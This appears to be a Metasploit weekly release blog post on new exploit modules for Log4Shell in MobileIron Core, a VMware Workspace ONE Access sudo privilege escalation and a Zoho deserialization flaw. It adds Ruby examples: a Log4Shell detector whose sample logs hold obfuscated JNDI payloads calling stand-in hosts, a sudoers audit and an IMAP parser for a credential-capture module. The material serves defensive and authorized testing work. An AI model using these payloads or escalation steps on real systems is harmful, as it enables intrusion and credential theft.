Metasploit Weekly Wrap-Up


## Log4Shell in MobileIron Core

![Metasploit Weekly Wrap-Up](https://blog.rapid7.com/content/images/2022/08/metasploit-ascii-1-2.png)

Thanks to [jbaines-r7](<https://github.com/jbaines-r7>) we have yet another Log4Shell [exploit](<https://github.com/rapid7/metasploit-framework/pull/16837>). Like the other Log4Shell exploit modules, it works by sending a JNDI lookup string (`${jndi:...}`) in a request field that the server passes through a vulnerable Log4j logger; the lookup makes the server fetch and deserialize an attacker-supplied object, resulting in unauthenticated remote code execution as the `tomcat` user. Vulnerable versions of MobileIron Core have been reported as [exploited](<https://www.mandiant.com/resources/mobileiron-log4shell-exploitation>) in the wild.

## VMware Workspace ONE Access LPE

Our very own [Spencer McIntyre](<https://github.com/zeroSteiner>) discovered and added a local privilege escalation [module](<https://github.com/rapid7/metasploit-framework/pull/16854>) for [CVE-2022-31660](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>) in VMware Workspace ONE Access. By default, the `horizon` user has write permission to `/opt/vmware/certproxy/bin/cert-proxy.sh`, and the `sudo` configuration lets that user run `certproxyService.sh`, which in turn executes `cert-proxy.sh`, as `root` without supplying a password. An attacker running as `horizon` can therefore write arbitrary commands into `cert-proxy.sh` and invoke `certproxyService.sh` with `sudo` to have them executed as `root`. Because the `horizon` user runs the externally-facing web application in VMware Workspace ONE Access, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) can be leveraged for initial access to the target, after which this module escalates to `root`.
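Defenders hunting for the probes this MobileIron module sends can key on the lookup string itself, but attackers routinely wrap it in nested Log4j lookups such as `${lower:j}` or the empty-key default `${::-j}` to slip past a naive `${jndi:` match. The Ruby below is an added example written for this post, not the module's code or anything from the Metasploit repository: it collapses those lookups to literal text before matching, then reports the scheme and callback host of each hit. The log lines are constructed for the example; the `/mifs/` path and the 203.0.113.0/24 addresses are illustrative.

```ruby
# frozen_string_literal: true

# Innermost Log4j lookup: a ${...} whose body contains no further '${' or '}'.
INNER_LOOKUP = /\$\{([^${}]*)\}/

# Reduce the lookup forms attackers use to hide the word "jndi" to a literal.
# Returns nil for anything we cannot reduce offline (e.g. "jndi:ldap://...").
def resolve_lookup(body)
  if (m = body.match(/\A(lower|upper):(.*)\z/m))
    return m[1] == 'lower' ? m[2].downcase : m[2].upcase
  end
  # ${key:-default} and the empty-key trick ${::-x}: the key is not meant to
  # resolve, so Log4j falls through to the default text.
  if (idx = body.index(':-'))
    return body[(idx + 2)..]
  end
  nil
end

# Repeatedly collapse innermost lookups until nothing changes. The pass limit
# keeps a pathological line from spinning the scanner.
def normalize_lookups(text, max_passes: 10)
  current = text.dup
  max_passes.times do
    reduced = current.gsub(INNER_LOOKUP) do |whole|
      resolved = resolve_lookup(Regexp.last_match(1))
      resolved.nil? ? whole : resolved
    end
    break if reduced == current
    current = reduced
  end
  current
end

# Scheme and host:port of the callback the payload would trigger.
JNDI_TARGET = /\$\{jndi:([a-z]+):\/\/([^\/\s}]+)/i

# nil for a clean line; otherwise the callback details and the de-obfuscated line.
def jndi_finding(line)
  norm = normalize_lookups(line)
  return nil unless norm =~ /\$\{jndi:/i
  m = norm.match(JNDI_TARGET)
  { scheme: m && m[1].downcase, target: m && m[2], normalized: norm }
end

def scan_log(lines)
  lines.each_with_object([]) do |line, hits|
    finding = jndi_finding(line)
    hits << finding.merge(line: line) if finding
  end
end

# Constructed sample: three probes (plain, lower-lookup, and empty-key default
# obfuscation) against a MobileIron-style path, plus two benign lines.
SAMPLE_LOG = [
  '10.0.0.5 - - "GET /mifs/ HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
  '10.0.0.5 - - "GET /mifs/ HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.10:1389/b}"',
  '10.0.0.5 - - "GET /mifs/ HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.11:1099/c}"',
  '10.0.0.6 - - "GET /mifs/ HTTP/1.1" 200 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
  '10.0.0.7 - - "GET /mifs/ HTTP/1.1" 200 "-" "${env:HOME}/agent"'
].freeze

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each do |hit|
    puts "#{hit[:scheme]} callback to #{hit[:target]} :: #{hit[:normalized]}"
  end
end
```

Only the `lower`, `upper` and `:-default` forms are reduced here because they are the ones that can be evaluated without the target's environment; a `${env:...}` or `${sys:...}` lookup with no default is left as-is, which is the right call for a detector since it still contains no `jndi` after normalization. Matching on the normalized text rather than the raw line is what lets the second and third sample probes be caught and attributed to the same callback infrastructure as the first.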
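The misconfiguration behind this LPE, a passwordless `sudo` rule whose target runs a file the low-privileged user can edit, is easy to audit for generically. The Ruby below is an added example for this post, not the module's code: it parses `NOPASSWD` rules for a given user, follows absolute paths referenced inside each permitted script, and flags any file the user can write to. The sudoers text, directory layout and file modes are constructed to mirror the description above; the rule actually shipped with Workspace ONE Access is not reproduced here.

```ruby
# frozen_string_literal: true

require 'tmpdir'
require 'fileutils'

# One sudoers line granting passwordless commands: "user HOST=(runas) NOPASSWD: cmd[, cmd]".
NOPASSWD_RULE = /\A(\S+)\s+\S+=(?:\([^)]*\)\s*)?NOPASSWD:\s*(.+)\z/

# Absolute paths a shell script mentions, e.g. the helper a wrapper execs.
ABS_PATH = %r{(?<![\w/])/[\w./-]+}

# Constructed sudoers text modelled on the advisory text; not the vendor's file.
SUDOERS = <<~EOS
  # /etc/sudoers.d/example (constructed)
  Defaults    env_reset
  horizon ALL=(root) NOPASSWD: /opt/vmware/certproxy/bin/certproxyService.sh
  tomcat  ALL=(root) NOPASSWD: /usr/bin/systemctl restart tomcat
EOS

# Commands `user` may run via sudo without a password (argument patterns dropped).
def nopasswd_commands(sudoers_text, user)
  sudoers_text.each_line.flat_map do |raw|
    line = raw.strip
    next [] if line.empty? || line.start_with?('#')
    m = NOPASSWD_RULE.match(line)
    next [] unless m && m[1] == user
    m[2].split(',').map { |c| c.strip.split(/\s+/).first }
  end
end

# Writable by uid/gid per the classic mode bits. Root is deliberately not
# special-cased, so the audit can run as root over a copied tree and still
# describe what the unprivileged user could do.
def writable_by?(path, uid:, gid:)
  st = File.stat(path)
  return true if st.uid == uid && (st.mode & 0o200) != 0
  return true if st.gid == gid && (st.mode & 0o020) != 0
  (st.mode & 0o002) != 0
rescue Errno::ENOENT
  false
end

def referenced_paths(script)
  return [] unless File.file?(script)
  File.read(script).scan(ABS_PATH).uniq
end

# Each finding names the sudo-permitted command and the writable file that lets
# `user` control what it runs; indirect: true means the writable file is a helper
# the permitted command calls, which is the shape of CVE-2022-31660.
def audit_nopasswd(sudoers_text, user:, uid:, gid:, root: '/')
  nopasswd_commands(sudoers_text, user).flat_map do |cmd|
    ([cmd] + referenced_paths(File.join(root, cmd))).map do |path|
      next unless writable_by?(File.join(root, path), uid: uid, gid: gid)
      { via: cmd, writable: path, indirect: path != cmd }
    end.compact
  end
end

# Throwaway tree with the described layout: a read-only wrapper that execs a
# helper writable by the current user. Returns the audit findings.
def demo_findings
  Dir.mktmpdir do |root|
    bin = File.join(root, 'opt/vmware/certproxy/bin')
    FileUtils.mkdir_p(bin)
    wrapper = File.join(bin, 'certproxyService.sh')
    helper  = File.join(bin, 'cert-proxy.sh')
    File.write(wrapper, "#!/bin/bash\n/opt/vmware/certproxy/bin/cert-proxy.sh \"$@\"\n")
    File.write(helper, "#!/bin/bash\necho cert-proxy\n")
    File.chmod(0o555, wrapper) # the wrapper itself cannot be modified...
    File.chmod(0o775, helper)  # ...but the helper it runs as root can be
    audit_nopasswd(SUDOERS, user: 'horizon', uid: Process.euid, gid: Process.egid, root: root)
  end
end

if $PROGRAM_NAME == __FILE__
  demo_findings.each { |f| puts "#{f[:via]} -> writable #{f[:writable]} (indirect=#{f[:indirect]})" }
end
```

The `root:` parameter exists so the check can be pointed at a mounted or copied filesystem image rather than the live host. Two caveats a real audit would add: a writable parent directory lets the user replace a read-only file outright, and a script can pull in code through relative paths, `source` of files found via `$PATH`, or environment variables that `sudo` may preserve, none of which the simple absolute-path scan above follows.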
## XML-RPC Unauthenticated RCE in Zoho Password Manager Pro

[Grant Willcox](<https://github.com/gwillcox-r7>) of the Metasploit team added a [module](<https://github.com/rapid7/metasploit-framework/pull/16852>) that exploits a Java deserialization flaw in Zoho Password Manager Pro. A single unauthenticated POST request carrying XML-RPC data to the `/xmlrpc` endpoint results in code execution as `NT AUTHORITY\SYSTEM`.

## New module content (5)

* [Cisco PVC2300 POE Video Camera configuration download](<https://github.com/rapid7/metasploit-framework/pull/16857>) by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP cameras that downloads the device configuration file using hard-coded credentials.
* [BACnet Scanner](<https://github.com/rapid7/metasploit-framework/pull/16788>) by Paz - This adds a scanner module that discovers BACnet devices on the network and extracts the model name, software version, firmware revision, and device description. The results are displayed on screen and saved to a local XML file.
* [MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16837>) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) - This adds an exploit for MobileIron Core, which is affected by the Log4Shell vulnerability. The result is unauthenticated remote code execution in the context of the web application user.
* [VMware Workspace ONE Access CVE-2022-31660](<https://github.com/rapid7/metasploit-framework/pull/16854>) by Spencer McIntyre, which exploits [CVE-2022-31660](<https://attackerkb.com/topics/GUT2CbttnF/cve-2022-31660?referrer=blog>) - This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021.
The underlying flaw is that the `/opt/vmware/certproxy/bin/cert-proxy.sh` script is writable by the `horizon` user, who can also indirectly execute it by invoking the `certproxyService.sh` script via `sudo`, which is permitted without a password, enabling escalation to `root`.
* [Zoho Password Manager Pro XML-RPC Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/16852>) by Grant Willcox, Vinicius, and Y4er, which exploits [CVE-2022-35405](<https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405?referrer=blog>) - This adds an exploit module for CVE-2022-35405, the Zoho Password Manager Pro XML-RPC unauthenticated RCE, which yields code execution as SYSTEM.

## Enhancements and features (3)

* [#16833](<https://github.com/rapid7/metasploit-framework/pull/16833>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) - This adds an option to the `hosts` command to make it easier to delete host tags.
* [#16840](<https://github.com/rapid7/metasploit-framework/pull/16840>) from [bcoles](<https://github.com/bcoles>) - This replaces some Meterpreter-only method calls with calls that check the session type, which allows non-Meterpreter sessions to use `read_profile_list` and `load_missing_hives`. It also changes `read_profile_list` to read profile information for all accounts.
* [#16858](<https://github.com/rapid7/metasploit-framework/pull/16858>) from [adfoster-r7](<https://github.com/adfoster-r7>) - This improves error handling in the ZeroLogon module's `check` method, so that an invalid NetBIOS name is reported with a meaningful message.

## Bugs fixed (8)

* [#16820](<https://github.com/rapid7/metasploit-framework/pull/16820>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) - This fixes an issue in the `ldap_query` module where the module would fail if the `action` datastore option was not set.
* [#16822](<https://github.com/rapid7/metasploit-framework/pull/16822>) from [adfoster-r7](<https://github.com/adfoster-r7>) - This fixes a bug in `Rex::Ui::Text::Input::Buffer::BufferSock` that occasionally caused data to be lost because the rsock monitor routine stopped abruptly.
* [#16825](<https://github.com/rapid7/metasploit-framework/pull/16825>) from [rbowes-r7](<https://github.com/rbowes-r7>) - The IMAP credential capture module did not correctly handle literal strings (`{n}` followed by CRLF and then exactly `n` octets) as specified by RFC 3501. The code has been updated to handle these strings.
* [#16832](<https://github.com/rapid7/metasploit-framework/pull/16832>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) - This removes an unnecessary `echo` statement from the `ms10_092_schelevator` module.
* [#16839](<https://github.com/rapid7/metasploit-framework/pull/16839>) from [bcoles](<https://github.com/bcoles>) - This fixes error checking in `shell_registry_enumvals` and `shell_registry_getvaldata`.
* [#16844](<https://github.com/rapid7/metasploit-framework/pull/16844>) from [bcoles](<https://github.com/bcoles>) - This updates `post/multi/gather` to support non-Meterpreter sessions such as shell and PowerShell.
* [#16846](<https://github.com/rapid7/metasploit-framework/pull/16846>) from [jmartin-r7](<https://github.com/jmartin-r7>) - This updates `auxiliary/scanner/ssh/ssh_login` to gracefully handle `Errno::EPIPE` exceptions.
* [#16848](<https://github.com/rapid7/metasploit-framework/pull/16848>) from [jmartin-r7](<https://github.com/jmartin-r7>) - This fixes a crash when updating session information in Meterpreter.
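The IMAP literal fix in #16825 deserves a closer look, because a credential-capture server that only understands atoms and quoted strings loses exactly the logins it exists to record: a client may send `a001 LOGIN {5}` followed by CRLF, wait for the server's `+` continuation, and only then send the five octets of the username. The parser below is an added example written for this post, not code from the module or the PR; it consumes atoms, quoted strings and synchronizing literals incrementally and tells the caller when a continuation reply is owed. The client exchanges used to exercise it are constructed.

```ruby
# frozen_string_literal: true

# Incremental parser for IMAP client commands whose arguments may be atoms,
# quoted strings, or RFC 3501 literals ("{n}" CRLF followed by exactly n octets).
class ImapCommandParser
  CRLF = "\r\n"

  # True when the client has announced a literal and is waiting for the server's
  # "+ " continuation before it sends the octets; answer it or the password never arrives.
  attr_reader :continuation_due

  def initialize
    @buf = +''
    @continuation_due = false
    @stalled_at = nil # offset of the literal we are waiting on
    @acked_at = nil   # offset of the literal we already sent "+" for
  end

  # Feed raw client bytes; returns every completed [tag, COMMAND, args] triple.
  def feed(data)
    @buf << data
    @continuation_due = false
    commands = []
    while (result = parse_one(@buf))
      cmd, consumed = result
      commands << cmd if cmd
      @buf = @buf[consumed..]
      @acked_at = nil
    end
    commands
  end

  # Call after writing "+ go ahead\r\n" to the client so we do not prompt twice.
  def continuation_sent!
    @acked_at = @stalled_at
    @continuation_due = false
  end

  private

  # [[tag, COMMAND, args], consumed], [nil, consumed] for a blank line, or nil
  # when the command is not complete yet.
  def parse_one(buf)
    pos = 0
    tokens = []
    loop do
      pos += 1 while buf[pos] == ' '
      return nil if pos >= buf.size
      if buf[pos, 2] == CRLF
        pos += 2
        break
      end
      tok, pos = read_token(buf, pos)
      return nil if tok.nil?
      tokens << tok
    end
    return [nil, pos] if tokens.empty?
    tag, name, *args = tokens
    [[tag, name.to_s.upcase, args], pos]
  end

  def read_token(buf, pos)
    case buf[pos]
    when '{' then read_literal(buf, pos)
    when '"' then read_quoted(buf, pos)
    else read_atom(buf, pos)
    end
  end

  # Atom: bytes up to the next space or CRLF; that delimiter must have arrived.
  def read_atom(buf, pos)
    stop = pos
    stop += 1 until stop >= buf.size || buf[stop] == ' ' || buf[stop, 2] == CRLF
    stop < buf.size ? [buf[pos...stop], stop] : nil
  end

  # Quoted string: backslash escapes '"' and '\'; a bare CR or LF is not permitted.
  def read_quoted(buf, pos)
    out = +''
    i = pos + 1
    while i < buf.size
      c = buf[i]
      raise ArgumentError, 'bare CR/LF inside quoted string' if c == "\r" || c == "\n"
      return [out, i + 1] if c == '"'
      if c == '\\'
        return nil if i + 1 >= buf.size
        i += 1
      end
      out << buf[i]
      i += 1
    end
    nil
  end

  # Literal: "{n}" CRLF then n raw octets (any byte at all, including quotes and CRLF).
  def read_literal(buf, pos)
    m = buf[pos..].match(/\A\{(\d+)\}\r\n/)
    # Not literal syntax but the line is complete: treat the token as an atom.
    return(buf.index(CRLF, pos) ? read_atom(buf, pos) : nil) unless m
    len = m[1].to_i
    body_start = pos + m[0].size
    if buf.size < body_start + len
      @stalled_at = pos
      @continuation_due = true if @acked_at != pos
      return nil
    end
    [buf[body_start, len], body_start + len]
  end
end
```

Because a literal's body is counted rather than delimited, a password containing quotes, spaces or CRLF passes through intact, which is why clients fall back to literals for exactly the credentials a quoted-string-only parser would mangle. Non-synchronizing literals (`{n+}`, RFC 7888) are not handled here; a capture server that advertises `LITERAL+` would need to accept that form as well.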
## Get it

As always, you can update to the latest Metasploit Framework with `msfupdate`, and you can get more details on the changes since the last blog post from GitHub:

* [Pull Requests 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-07-29T13%3A06%3A04-05%3A00..2022-08-04T11%3A39%3A27-05%3A00%22>)
* [Full diff 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/compare/6.2.10...6.2.11>)

If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).